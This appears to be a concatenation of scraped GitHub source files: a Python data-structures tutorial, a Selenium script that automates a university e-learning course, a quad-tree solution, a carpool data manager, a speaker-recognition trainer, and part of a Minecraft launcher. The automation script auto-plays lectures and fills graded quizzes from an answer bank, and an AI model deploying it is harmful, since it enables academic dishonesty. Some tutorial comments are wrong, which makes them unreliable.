[1, 2], 4)\na[2][0] = 3\nanswer = a[2] # answer = [3, 2], a = (1, \"string\", [3, 2], 4)\n\n# one can convert a list into a tuple by simply calling ``tuple`` function on it\na = [1, 2, 3, 4]\nanswer = tuple(a) # answer = (1, 2, 3, 4)\n\n###########################################################################\n# _____ _ _ _\n# | __ \\(_) | | (_)\n# | | | |_ ___| |_ _ ___ _ __ __ _ _ __ _ _\n# | | | | |/ __| __| |/ _ \\| '_ \\ / _` | '__| | | |\n# | |__| | | (__| |_| | (_) | | | | (_| | | | |_| |\n# |_____/|_|\\___|\\__|_|\\___/|_| |_|\\__,_|_| \\__, |\n# __/ |\n# |___/\n#\n###########################################################################\n\n###\n#\n# Dictionaries is a mutable key-value data structure\n# Complexity of element access O(1) (Amortized O(n))\n# Complexity of element setting O(1) (Amortized O(n))\n# Complexity of element deletion O(1) (Amortized O(n))\n#\n##\n\n# Dictionary declaration\n# Keys go before \":\" character. Any hashable object can be a key\n# Values go after \":\" character. Any object can be a value\na = {} # empty dictionary declaration\na = {1: \"1\", \"2\": 2}\n\n# Element setting\na[3] = \"3\"\nanswer = a # answer = {1: \"1\", \"2\": 2, 3: \"3\"}\n\n# Setting a new value to the already existing key overwrites previously set value\nanswer = a # answer = {1: \"1\", \"2\": 2, 3: \"3\"}\na[3] = 4\nanswer = a # answer = {1: \"1\", \"2\": 2, 3: 4}\n\n# Element accessing\nanswer = a[3] # answer = 4\n\n# Element deleting\ndel a[4]\nanswer = a # answer = {1: \"1\", \"2\": 2}\n\n\n# one can create a dictionary by using dict comprehensions, that are similar to list comprehensions, but with a slightly different syntax\n# this is, again, often used when one needs to create a dictionary based on the already existing collection of elements\na = {x: str(x) for x in [1, 2, 3, 4]} # a = {1: '1', 2: '2', 3: '3', 4: '4'}\n# condition is also allowed\na = {x: str(x) for x in [1, 2, 3, 4] if x % 2 == 0} # a = {2:'2', 4:'4'}\n# a nested iteration can be utilized as well, though, as well as in list case, more than two levels of collections are discouraged\n# in the comprehension syntax\na = {x * y: str(y) for y in [1, 2, 3] for x in [1, 2, 3, 4] if x % 2 == 0} # a = {2: '1', 4: '2', 8: '2', 6: '3', 12: '3'}\n\n\n###########################################################################\n#\n# _____ _\n# / ____| | |\n# | (___ ___| |_\n# \\___ \\ / _ \\ __|\n# ____) | __/ |_\n# |_____/ \\___|\\__|\n#\n#\n###########################################################################\n\n###\n#\n# Dictionaries is a mutable non ordered data structure of unique entries\n# Complexity of element addition O(1)\n# Complexity of element deletion O(n)\n#\n##\n\n# Set declaration\na = {1, 2, 3}\na = set() # empty set declaration. Can not do it with {}, as that is the way to declare empty an empty dictionary\n\n# Element addition\na.add(3)\nanswer = a # answer = {3}\n# Adding same element multiple times doesn't result in multiple entries\na.add(3)\nanswer = a # answer = {3}\n\n# Element deletion\na.remove(3)\nanswer = a # answer = {3}\n","repo_name":"aganezov/algo_bioinf","sub_path":"python_background/builtin_data_structures.py","file_name":"builtin_data_structures.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7280791023","text":"from setuptools import setup, find_packages\nimport pathlib\n\n# Reading the long description from README.md\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / \"README.md\").read_text()\n\nsetup(\n name=\"pylite\",\n version=\"0.0.1\",\n python_requires=\">=3.9\",\n description=\"An SQLite ORM for Python, inspired by Laravel's Eloquent.\",\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/benhmoore/PyLite\",\n author=\"Ben Moore\",\n author_email=\"ben@benhmoore.com\",\n license=\"MIT\", # Assuming the license in LICENSE.txt is MIT\n classifiers=[\n \"Programming Language :: Python :: 3.9\",\n # Add other relevant classifiers\n ],\n packages=find_packages(), # assuming your package is organized correctly\n install_requires=[\"colorama\", \"inflect\"],\n)\n","repo_name":"benhmoore/PyLite","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35193775015","text":"# 导入\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport re\n\n\n\n# 定义常量\n# 用于匹配题目的正则表达式\nFindProblemText = re.compile(r'】.*?[??((。::]+')\nFindChineseText = re.compile(r'[\\u4e00-\\u9fa5]+')\n# 用于匹配答案的字符串和列表\ndaan = '答案'\nanswers = ['A','B','C','D','√','×']\n# 读取题库\nfile = open('answer.txt','rb')\nlines = file.readlines()\nfile.close()\n# 支持的学校\nSupportSchool = {'1':['上海大学','SHU'],'2':['其他单位','others']}\nfor i in SupportSchool :\n print(i,SupportSchool[i][0],SupportSchool[i][1])\n# 学校,用户名,密码,课程链接\nSchoolName = input('请输入学校序号')\nSchoolName = SupportSchool[SchoolName][1]\nUserName = input('请输入用户名')\nPassword = input('请输入密码')\nClassUrl = input('请输入课程链接')\n\n\ndef login(school,username,password,WebDriver) :\n ''' \n 登录,参数:学校,用户名,密码,webdriver\n '''\n if school == 'SHU' : # 上海大学\n while True :\n try :\n WebDriver.get(\"http://www.elearning.shu.edu.cn/portal\")\n break\n except :\n continue\n # 定位登录按钮并点击\n LoginButton = WebDriver.find_element_by_css_selector('.loginSub') \n LoginButton.click()\n # 用户名密码输入框,提交按钮\n UsernameInput = WebDriver.find_element_by_name('username')\n PasswordInput = WebDriver.find_element_by_name('password')\n LoginSubmit = WebDriver.find_element_by_name('login_submit')\n # 输入用户名密码,提交 \n InputAction = webdriver.ActionChains(WebDriver)\n InputAction.click(UsernameInput)\n InputAction.send_keys_to_element(UsernameInput,username)\n InputAction.click(PasswordInput)\n InputAction.send_keys_to_element(PasswordInput,password)\n InputAction.click(LoginSubmit)\n InputAction.perform()\n else :\n WebDriver.get('http://www.xuexi365.com/') # 超星平台登录\n # 选择单位\n ChooseSchool = WebDriver.find_element_by_class_name('Select')\n ChooseSchool.click()\n # 搜索学校\n SchoolNameSearch = input('请输入学校名称')\n SearchBar = WebDriver.find_element_by_class_name('zw_t_input')\n SearchButton = WebDriver.find_element_by_class_name('zw_t_btn')\n SearchSchool = webdriver.ActionChains(WebDriver)\n SearchSchool.click(SearchBar)\n SearchSchool.send_keys_to_element(SearchBar,SchoolNameSearch)\n SearchSchool.click(SearchButton)\n SearchSchool.perform()\n time.sleep(3)\n # 搜索结果\n SearchAnswers = WebDriver.find_elements_by_css_selector('.zw_m_li')\n for i in range(len(SearchAnswers)) :\n if SearchAnswers[i].is_displayed():\n name = SearchAnswers[i].get_attribute('textContent')\n print(i,name)\n SchoolNumber = input('请输入序号')\n SearchAnswers[int(SchoolNumber)].click()\n # 用户名密码输入框,提交按钮\n UsernameInput = WebDriver.find_element_by_name('uname')\n PasswordInput = WebDriver.find_element_by_name('password')\n VerifyCodeInput = WebDriver.find_element_by_name('numcode')\n LoginSubmit = WebDriver.find_element_by_name('button')\n VerifyCode = input('请输入验证码')\n # 输入用户名密码,提交 \n InputAction = webdriver.ActionChains(WebDriver)\n InputAction.click(UsernameInput)\n InputAction.send_keys_to_element(UsernameInput,username)\n InputAction.click(PasswordInput)\n InputAction.send_keys_to_element(PasswordInput,password)\n InputAction.click(VerifyCodeInput)\n InputAction.send_keys_to_element(VerifyCodeInput,VerifyCode)\n InputAction.click(LoginSubmit)\n InputAction.perform()\ndef GotoClass(WebDriver) :\n '''\n 前往课程页面,driver为必选参数\n '''\n WebDriver.get(ClassUrl)\ndef FindViedo (WebDriver) :\n '''\n 寻找视频\n '''\n VideoList = []\n VideoClassName = 'ans-insertvideo-online'\n frames = WebDriver.find_elements_by_tag_name('iframe')\n for i in range(len(frames)):\n frames = WebDriver.find_elements_by_tag_name('iframe')\n classname = frames[i].get_attribute('class')\n if VideoClassName in classname :\n VideoList.append(frames[i])\n return VideoList\ndef FindCourse(WebDriver) :\n '''\n 定位所有课\n '''\n courses = WebDriver.find_elements_by_class_name('articlename')\n return courses\ndef GotoCourse(course,WebDriver) :\n '''\n 下拉到一节课,然后跳转,参数:课,driver\n '''\n WebDriver.execute_script(\"arguments[0].scrollIntoView();\",course)\n course.click()\ndef ShowTitle(WebDriver) :\n '''\n 显示小节标题\n '''\n title = WebDriver.find_element_by_tag_name('h1').get_attribute('textContent')\n print(title)\ndef FindTestTag(WebDriver):\n '''\n 定位答题标签\n '''\n TestTag = WebDriver.find_element_by_id('dct2')\n print('发现题目')\n TestTag.click()\ndef PlayVideo(WebDriver) :\n '''\n 定位视频并播放\n '''\n video = WebDriver.find_element_by_class_name('ans-attach-ct')\n video.click()\n print('开始播放')\ndef isVideoOver(WebDriver) :\n '''\n 视频是否结束\n '''\n duration = WebDriver.find_element_by_class_name('vjs-duration-display').get_attribute('textContent')\n now = WebDriver.find_element_by_class_name('vjs-current-time-display').get_attribute('textContent') \n print('已播放{}/{}'.format(now,duration))\n return duration == now\ndef ProbleminVideo(WebDriver) :\n '''\n 处理视频中的题\n '''\n ProblemChoices = WebDriver.find_elements_by_name('ans-videoquiz-opt')\n SubmitAnswer = WebDriver.find_element_by_class_name('ans-videoquiz-submit')\n print('发现视频中题')\n for i in range(len(ProblemChoices)) :\n print('正在尝试第{}个选项'.format(i+1))\n ProblemChoices = WebDriver.find_elements_by_name('ans-videoquiz-opt')\n ProblemChoices[i].click() \n time.sleep(2)\n SubmitAnswer.click()\n time.sleep(2)\n alert = WebDriver.switch_to.alert\n alert.accept()\ndef FindProblems(WebDriver) :\n '''\n 匹配所有题目的题干,返回一个题目列表\n '''\n text = WebDriver.find_elements_by_css_selector('.Zy_TItle')\n problems = []\n for i in range(len(text)) :\n ProblemText = text[i].get_attribute('textContent')\n try :\n ProblemText = FindProblemText.findall(ProblemText)[0]\n except :\n ProblemText = FindChineseText.findall(ProblemText)[0]\n ProblemText = ProblemText.lstrip('】').rstrip('(').rstrip('?').rstrip('。').rstrip('(')\n problems.append(ProblemText)\n return problems\ndef FindAnswer(problem) :\n '''\n 在题库中寻找题目的答案并返回\n '''\n j = 0\n for i in range(6805):\n words = str(lines[i].decode('utf-8'))\n if problem[2:-2]in words:\n j = i\n break\n while True :\n words = str(lines[j].decode('utf-8'))\n if daan in words :\n for char in words :\n if char in answers:\n return char\n break\n else:\n j += 1\ndef FindProblemChoices(WebDriver) :\n '''\n 寻找所有选项,返回一个字典\n '''\n AllChoices = {'A':[],'B':[],'C':[],'D':[],'':[],'×':[]}\n AllInput = WebDriver.find_elements_by_tag_name('input')\n for AInput in AllInput :\n ChoiceValue = AInput.get_attribute('value')\n if ChoiceValue =='true':\n ChoiceValue = '√'\n elif ChoiceValue == 'false':\n ChoiceValue = '×'\n try :\n AllChoices[ChoiceValue].append(AInput)\n except :\n pass\n return AllChoices\ndef AnswerProblem(num,answer,choices,WebDriver) :\n '''\n 回答问题,三个参数:题号,答案,存储所有选项的字典\n '''\n target = choices[answer][num]\n WebDriver.execute_script(\"arguments[0].scrollIntoView();\",target)\n target.click()\n print('第{}题,选择{}'.format(num+1,answer))\ndef SubmitAnswer(WebDriver) :\n '''\n 提交答案\n '''\n SubmitButton = WebDriver.find_element_by_css_selector('.Btn_blue_1')\n SubmitButton.click()\n moveup = webdriver.ActionChains(WebDriver)\n moveup.send_keys(Keys.PAGE_UP)\n moveup.perform()\n time.sleep(2)\n confirm = WebDriver.find_element_by_class_name('bluebtn ')\n confirm.click()\ndef FindFile(WebDriver) :\n '''\n 寻找所有文件的object id\n '''\n FileFrames = WebDriver.find_elements_by_tag_name('iframe')\n Files = [i.get_attribute('objectid') for i in FileFrames]\n return Files\ndef FindAudio(WebDriver):\n '''\n 音频任务\n '''\n AudioList = []\n AudioClassName = 'ans-insertaudio'\n frames = WebDriver.find_elements_by_tag_name('iframe')\n for i in range(len(frames)):\n frames = WebDriver.find_elements_by_tag_name('iframe')\n classname = frames[i].get_attribute('class')\n if AudioClassName in classname :\n AudioList.append(frames[i])\n return AudioList\ndef PlayAudio(WebDriver):\n PlayButtion = WebDriver.find_element_by_class_name('vjs-play-control')\n PlayButtion.click()","repo_name":"Zhurp2020/AutoStudy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9417,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"38901243371","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : 427.py\n# @Time : 2020/7/29 9:57 上午\n# @Author : Rivarrl\n# ======================================\nfrom algorithm_utils import *\n\nclass Node:\n def __init__(self, val, isLeaf, topLeft, topRight, bottomLeft, bottomRight):\n self.val = val\n self.isLeaf = isLeaf\n self.topLeft = topLeft\n self.topRight = topRight\n self.bottomLeft = bottomLeft\n self.bottomRight = bottomRight\n\nclass Solution:\n \"\"\"\n [427. 建立四叉树](https://leetcode-cn.com/problems/construct-quad-tree/)\n \"\"\"\n @timeit\n def construct(self, grid: List[List[int]]) -> 'Node':\n def ok(i, j, s):\n return sum(grid[i+x][j+y] for x in range(s) for y in range(s)) in {0, s*s}\n def f(i, j, s):\n if s == 1 or ok(i, j, s): return Node(grid[i][j], True, None, None, None, None)\n t = s // 2\n NW, NE, SW, SE = f(i, j, t), f(i, j+t, t), f(i+t, j, t), f(i+t, j+t, t)\n return Node(1, False, NW, NE, SW, SE)\n n = len(grid)\n return f(0, 0, n)\n\nif __name__ == '__main__':\n a = Solution()\n grid = [[1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0]]\n","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/301-600/427.py","file_name":"427.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"69840796411","text":"#!/bin/env python3\n\nimport argparse\nimport importlib\n\ndef main():\n parser = argparse.ArgumentParser(description='Run day scripts')\n parser.add_argument('day', type=str, help='Day number')\n\n args = parser.parse_args()\n day = 'day'+args.day.rjust(2, '0')\n\n try:\n lib = importlib.import_module(day+'.script')\n lib.run()\n except ModuleNotFoundError:\n print(\"Day\",day,\"not found\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"hermzz/advent","sub_path":"advent2019/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"14795456595","text":"import csv\r\nimport numpy as np\r\nimport torch\r\n\r\n\r\n# save coordinates to file readable by Google My Maps\r\ndef save_coordinates(fname, coords, ids=None, extras=None):\r\n if extras is None:\r\n extras = ['' for i in range(len(coords))]\r\n\r\n if ids is None:\r\n ids = [i for i in range(len(coords))]\r\n\r\n with open(fname, 'w', newline='') as file:\r\n writer = csv.writer(file, delimiter=',')\r\n writer.writerow(['latitude', 'longitude', 'id', 'extras'])\r\n for i in range(len(coords)):\r\n writer.writerow([str(coords[i][0]), str(coords[i][1]), str(ids[i]), str(extras[i])])\r\n\r\n\r\n# load map coordinates from file\r\ndef load_coordinates(fname):\r\n with open(fname, 'r', encoding='utf8') as file:\r\n reader = csv.DictReader(file, delimiter=',')\r\n coords = [[float(row['latitude']), float(row['longitude'])] for row in reader]\r\n\r\n return coords\r\n\r\n\r\n# load a distance matrix from file\r\ndef load_matrix(fname):\r\n dist = []\r\n with open(fname, 'r', encoding='utf8') as file:\r\n reader = csv.reader(file, delimiter=',')\r\n for row in reader:\r\n dist.append([float(d) for d in row])\r\n\r\n return dist\r\n\r\n\r\nclass CarpoolDataManager:\r\n \"\"\"\r\n A class that manages the data needed for carpooling purposes.\r\n It contains a set of coordinates and their distances and can sample from them,\r\n normalize the data and make submatrices of the initial data if needed.\r\n \"\"\"\r\n def set_data(self):\r\n # initializes the class fields\r\n\r\n self.d_min = np.min(self.dist[self.dist > 0])\r\n self.d_max = np.max(self.dist)\r\n\r\n self.lat_max = np.max(self.coords[:, 0])\r\n self.lat_min = np.min(self.coords[:, 0])\r\n\r\n self.long_max = np.max(self.coords[:, 1])\r\n self.long_min = np.min(self.coords[:, 1])\r\n\r\n coords_n = self.coords.copy()\r\n coords_n[:, 0] = (coords_n[:, 0] - self.lat_min) / \\\r\n (self.lat_max - self.lat_min)\r\n coords_n[:, 1] = (coords_n[:, 1] - self.long_min) / \\\r\n (self.long_max - self.long_min)\r\n\r\n self.ids = {}\r\n for i in range(len(self.coords)):\r\n self.ids[(self.coords[i][0], self.coords[i][1])] = i\r\n self.ids[(coords_n[i][0], coords_n[i][1])] = i\r\n\r\n def __init__(self, dist_fname, coords_fname):\r\n \"\"\"\r\n Args:\r\n dist_fname (string): distance matrix file that specifies the distances between map coordinates\r\n coords_fname (string): file with map coordinates\r\n \"\"\"\r\n self.dist_fname = dist_fname\r\n self.coords_fname = coords_fname\r\n\r\n self.dist = load_matrix(self.dist_fname)\r\n self.coords = load_coordinates(self.coords_fname)\r\n\r\n self.coords = np.asarray(self.coords, dtype=np.float32)\r\n self.dist = np.asarray(self.dist, dtype=np.float32)\r\n\r\n self.set_data()\r\n\r\n def reset_data(self):\r\n # resets the class fields\r\n\r\n self.dist = load_matrix(self.dist_fname)\r\n self.coords = load_coordinates(self.coords_fname)\r\n\r\n self.coords = np.asarray(self.coords, dtype=np.float32)\r\n self.dist = np.asarray(self.dist, dtype=np.float32)\r\n\r\n self.set_data()\r\n\r\n def filter_data(self, max_range, idx_goal):\r\n # filter coordinates so that the class contains only those that are within a certain range from a specific\r\n # point indexed by idx_goal in the distance matrix\r\n\r\n self.coords = np.asarray(self.coords, dtype=np.float32)\r\n self.dist = np.asarray(self.dist, dtype=np.float32)\r\n\r\n if max_range is None or idx_goal is None:\r\n return\r\n\r\n idxs = np.argwhere(self.dist[:, idx_goal] <= max_range)[:, 0]\r\n\r\n dist_new = np.zeros([len(idxs), len(idxs)], dtype=self.dist.dtype)\r\n k = 0\r\n for i in idxs:\r\n dist_new[k, :] = self.dist[i, idxs]\r\n k += 1\r\n\r\n self.dist = dist_new\r\n self.coords = self.coords[idxs].copy()\r\n\r\n self.set_data()\r\n\r\n def pts2ids(self, points):\r\n ids = [self.ids[p[0], p[1]] for p in points]\r\n return ids\r\n\r\n def ids2pts(self, ids):\r\n return self.coords[ids].copy()\r\n\r\n def distances_ids(self, ids):\r\n # return the distances of some points indexed by ids\r\n\r\n n = len(ids)\r\n sample_dist = np.zeros([n, n])\r\n sample_coords = self.coords[ids, :].copy()\r\n k = 0\r\n for i in ids:\r\n sample_dist[k, :] = self.dist[i, ids]\r\n k += 1\r\n return sample_dist, sample_coords\r\n\r\n def distances_pts(self, points):\r\n n = len(points)\r\n ids = self.pts2ids(points)\r\n dist = np.zeros([n, n])\r\n k = 0\r\n for i in ids:\r\n dist[k, :] = self.dist[i, ids]\r\n k += 1\r\n return dist\r\n\r\n def sample_data(self, num_points, idx_goal=None, seed=None, calculate_dist=True):\r\n # sample some random carpool data\r\n\r\n if seed is not None:\r\n np.random.seed(seed)\r\n\r\n ids = np.arange(len(self.coords), dtype=np.uint32)\r\n\r\n np.random.shuffle(ids)\r\n if idx_goal is not None:\r\n idx = (ids == idx_goal)\r\n ids[idx], ids[0] = ids[0], ids[idx]\r\n\r\n r_ids = ids[:num_points]\r\n\r\n sample_coords = self.ids2pts(r_ids)\r\n\r\n sample_dist = None\r\n if calculate_dist:\r\n sample_dist = np.zeros([num_points, num_points], dtype=self.dist.dtype)\r\n k = 0\r\n for i in r_ids:\r\n sample_dist[k, :] = self.dist[i, r_ids]\r\n k += 1\r\n\r\n return sample_coords, r_ids, sample_dist\r\n\r\n def normalize(self, points):\r\n points_n = np.asarray(points, dtype=np.float32).copy()\r\n if points_n.ndim == 1:\r\n points_n[0] = (points_n[0] - self.lat_min) / (self.lat_max - self.lat_min)\r\n points_n[1] = (points_n[1] - self.long_min) / (self.long_max - self.long_min)\r\n else:\r\n points_n[:, 0] = (points_n[:, 0] - self.lat_min) / (self.lat_max - self.lat_min)\r\n points_n[:, 1] = (points_n[:, 1] - self.long_min) / (self.long_max - self.long_min)\r\n\r\n return points_n\r\n\r\n def denormalize(self, points):\r\n _points = np.asarray(points, dtype=np.float32).copy()\r\n if _points.ndim == 1:\r\n _points[0] = _points[0] * (self.lat_max - self.lat_min) + self.lat_min\r\n _points[1] = _points[1] * (self.long_max - self.long_min) + self.long_min\r\n else:\r\n _points[:, 0] = _points[:, 0] * (self.lat_max - self.lat_min) + self.lat_min\r\n _points[:, 1] = _points[:, 1] * (self.long_max - self.long_min) + self.long_min\r\n\r\n return _points\r\n\r\n def tensor_distance_2_pts(self, p1, p2):\r\n id1 = self.ids[p1[0].item(), p1[1].item()]\r\n id2 = self.ids[p2[0].item(), p2[1].item()]\r\n\r\n d = self.dist[id1][id2]\r\n\r\n return d\r\n\r\n def tensor_pts2ids(self, points):\r\n ids = [self.ids[p[0].item(), p[1].item()] for p in points]\r\n return ids\r\n\r\n def tensor_distances(self, t1, t2):\r\n t_size = len(t1)\r\n dist = [self.tensor_distance_2_pts(t1[i], t2[i]) for i in range(t_size)]\r\n dist = torch.tensor(dist, dtype=torch.float32)\r\n\r\n return dist\r\n\r\n def tensor_distances_ids(self, ids1, ids2):\r\n t_size = len(ids1)\r\n dist = [self.dist[ids1[i], ids2[i]] for i in range(t_size)]\r\n dist = torch.tensor(dist, dtype=torch.float32)\r\n\r\n return dist\r\n\r\n\r\nif __name__ == '__main__':\r\n coords_fname = 'map_data/carpool_map_coordinates.csv'\r\n dist_fname = 'map_data/distance_matrix.csv'\r\n\r\n mgr = CarpoolDataManager(dist_fname, coords_fname)\r\n mgr.filter_data(3000, idx_goal=0)\r\n\r\n coords, ids, dist = mgr.sample_data(20, idx_goal=0)\r\n\r\n mgr.reset_data()","repo_name":"giabarbou/qlearning_carpool","sub_path":"carpool_data.py","file_name":"carpool_data.py","file_ext":"py","file_size_in_byte":7849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42657551299","text":"import logging\nimport os\nimport time\n\nimport tensorflow as tf\nfrom keras.callbacks import TensorBoard\nfrom keras.losses import categorical_crossentropy\nfrom keras.metrics import categorical_accuracy\nfrom keras.optimizers import Adam\n\nfrom data_generators.base_data_generator import BaseBatchGenerator\nfrom models.deep_voice_speaker_model import deep_voice_speaker_model\nfrom utils.utils import SaverCallback, LoggingCallback, mkdir\nfrom keras.models import load_model\n\n\ndef train(inp_shape, train_batch_generator, val_batch_generator=None,\n init_lr=0.001, epochs=1000, steps_per_epoch=20, val_steps=20, workers=4, runs_dir=None, **kwargs):\n if runs_dir is None:\n runs_dir = 'deep_voice_' + str(int(time.time()))\n mkdir(runs_dir, True)\n model = deep_voice_speaker_model(inp_shape, **kwargs)\n opt = Adam(lr=init_lr)\n model.compile(optimizer=opt, loss=categorical_crossentropy, metrics=[categorical_accuracy])\n logging.info(model.summary())\n tb_callback = TensorBoard(log_dir=os.path.join(runs_dir, 'logs'), write_images=True)\n lc = LoggingCallback()\n sc = SaverCallback(saver=tf.train.Saver(max_to_keep=20, keep_checkpoint_every_n_hours=0.5),\n save_path=runs_dir,\n model=model, name='deep_voice_cnn')\n model.fit_generator(train_batch_generator, steps_per_epoch=steps_per_epoch,\n epochs=epochs, workers=workers, callbacks=[tb_callback, lc, sc],\n validation_data=val_batch_generator, validation_steps=val_steps,\n verbose=0)\n\n\ndef main(_):\n mkdir(os.path.join(FLAGS.runs_dir, \"training-log.txt\"))\n logging.basicConfig(level=logging.INFO, filename=os.path.join(FLAGS.runs_dir, \"training-log.txt\"),\n format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')\n logging.info(FLAGS.__dict__)\n # logging.basicConfig(level=logging.INFO)\n\n \"\"\"\n paper : Deep Voice 2: Multi-Speaker Neural Text-to-SpeechA\n focus : Speaker Discriminative Model\n url : https://arxiv.org/pdf/1705.08947.pdf\n \"\"\"\n\n num_speakers = FLAGS.num_speakers\n pkl_dir = FLAGS.pkl_dir\n data_gen = BaseBatchGenerator(FLAGS.data_path, num_speakers=num_speakers,\n frames=FLAGS.frames, id=FLAGS.id, pkl_dir=pkl_dir)\n train(inp_shape=(data_gen.frames, data_gen.dim, 1), train_batch_generator=data_gen.generator('train'),\n num_speakers=num_speakers, conv_rep=FLAGS.conv_rep, dropout=FLAGS.dp, steps_per_epoch=FLAGS.steps_per_epoch,\n val_batch_generator=data_gen.generator('dev'), val_steps=FLAGS.val_steps, runs_dir=FLAGS.runs_dir)\n\n\nif __name__ == '__main__':\n flags = tf.app.flags\n FLAGS = flags.FLAGS\n # /Users/venkatesh/datasets/timit/data/lisa/data/timit/raw/TIMIT/TRAIN\n flags.DEFINE_string('runs_dir', \"/Users/venkatesh/datasets/timit/data/lisa/data/timit/raw/TIMIT/TRAIN\",\n 'Runs path for tensorboard')\n flags.DEFINE_string('data_path', \"\", 'Dataset path')\n flags.DEFINE_integer('num_speakers', 200, 'Number of speakers')\n flags.DEFINE_integer('frames', 64, 'Number of frames')\n flags.DEFINE_integer('conv_rep', 5, 'Number of conv layers')\n flags.DEFINE_integer('steps_per_epoch', 200, 'Steps for epoch')\n flags.DEFINE_integer('val_steps', 100, 'Validation steps')\n flags.DEFINE_float('dp', 0.0, 'Dropout')\n flags.DEFINE_string('pkl_dir', \"\", 'Temporary directory to store input data')\n flags.DEFINE_string('id', \"TIMIT\", 'Corpus identifier')\n tf.app.run()\n","repo_name":"venkatesh-1729/DeepSpeaker","sub_path":"trainers/deep_voice_trainer.py","file_name":"deep_voice_trainer.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71856793531","text":"from PyQt6.QtWidgets import QWidget, QTableWidget, QTableWidgetItem, QVBoxLayout, QHBoxLayout, QGridLayout, QPlainTextEdit, QTabWidget, QAbstractItemView, QHeaderView, QPushButton, QComboBox, QProgressBar, QLabel, QCheckBox, QMenu, QLineEdit, QSizePolicy, QMessageBox\nfrom PyQt6.QtCore import QUrl, QLocale, Qt, QProcess, QCoreApplication\nfrom PyQt6.QtWebEngineWidgets import QWebEngineView\nfrom PyQt6.QtWebEngineCore import QWebEngineProfile\nfrom PyQt6.QtGui import QCursor, QAction, QIcon, QContextMenuEvent, QCloseEvent\nfrom jdMinecraftLauncher.gui.ProfileWindow import ProfileWindow\nfrom jdMinecraftLauncher.Profile import Profile\nfrom jdMinecraftLauncher.Shortcut import canCreateShortcuts, askCreateShortcut\nfrom jdMinecraftLauncher.Functions import openFile, getAccountDict\nfrom jdMinecraftLauncher.InstallThread import InstallThread\nfrom jdMinecraftLauncher.RunMinecraft import getMinecraftCommand\nfrom jdMinecraftLauncher.Environment import Environment\nfrom jdMinecraftLauncher.Languages import getLanguageNames\nimport minecraft_launcher_lib\nfrom typing import List\nimport urllib.parse\nimport webbrowser\nimport platform\nimport tempfile\nimport random\nimport shutil\nimport json\nimport sys\nimport os\n\n\nclass ProfileEditorTab(QTableWidget):\n def __init__(self, env: Environment, mainwindow: \"MainWindow\"):\n super().__init__(0,2)\n self.env = env\n self.mainWindow = mainwindow\n self.setSelectionBehavior(QAbstractItemView.SelectionBehavior.SelectRows)\n self.setHorizontalHeaderLabels((QCoreApplication.translate(\"MainWindow\", \"Profile Name\"), QCoreApplication.translate(\"MainWindow\", \"Minecraft Version\")))\n self.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeMode.Stretch)\n self.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n self.setSelectionMode(QAbstractItemView.SelectionMode.SingleSelection)\n self.verticalHeader().hide()\n self.setShowGrid(False)\n self.updateProfiles()\n\n def updateProfiles(self):\n while self.rowCount() > 0:\n self.removeRow(0)\n count = 0\n for i in self.env.profileCollection.profileList:\n nameItem = QTableWidgetItem(i.name)\n nameItem.setFlags(nameItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n if i.useLatestVersion:\n versionItem = QTableWidgetItem(QCoreApplication.translate(\"MainWindow\", \"(Latest version)\"))\n elif i.useLatestSnapshot:\n versionItem = QTableWidgetItem(QCoreApplication.translate(\"MainWindow\", \"(Latest snapshot)\"))\n else:\n versionItem = QTableWidgetItem(i.version)\n versionItem.setFlags(versionItem.flags() ^ Qt.ItemFlag.ItemIsEditable)\n self.insertRow(count)\n self.setItem(count, 0, nameItem) \n self.setItem(count, 1, versionItem) \n count += 1\n\n def contextMenuEvent(self, event: QContextMenuEvent):\n self.menu = QMenu(self)\n\n addProfile = QAction(QCoreApplication.translate(\"MainWindow\", \"Add Profile\"), self)\n addProfile.triggered.connect(self.addProfile)\n self.menu.addAction(addProfile)\n \n editProfile = QAction(QCoreApplication.translate(\"MainWindow\", \"Edit Profile\"), self)\n editProfile.triggered.connect(self.editProfile)\n self.menu.addAction(editProfile)\n\n copyProfile = QAction(QCoreApplication.translate(\"MainWindow\", \"Copy Profile\"), self)\n copyProfile.triggered.connect(self.copyProfile)\n self.menu.addAction(copyProfile)\n\n removeProfile = QAction(QCoreApplication.translate(\"MainWindow\", \"Remove Profile\"), self)\n removeProfile.triggered.connect(self.removeProfile)\n self.menu.addAction(removeProfile)\n\n openGameFolder = QAction(QCoreApplication.translate(\"MainWindow\", \"Open Game Folder\"), self)\n openGameFolder.triggered.connect(lambda: openFile(self.env.profileCollection.profileList[self.currentRow()].getGameDirectoryPath()))\n self.menu.addAction(openGameFolder)\n\n if 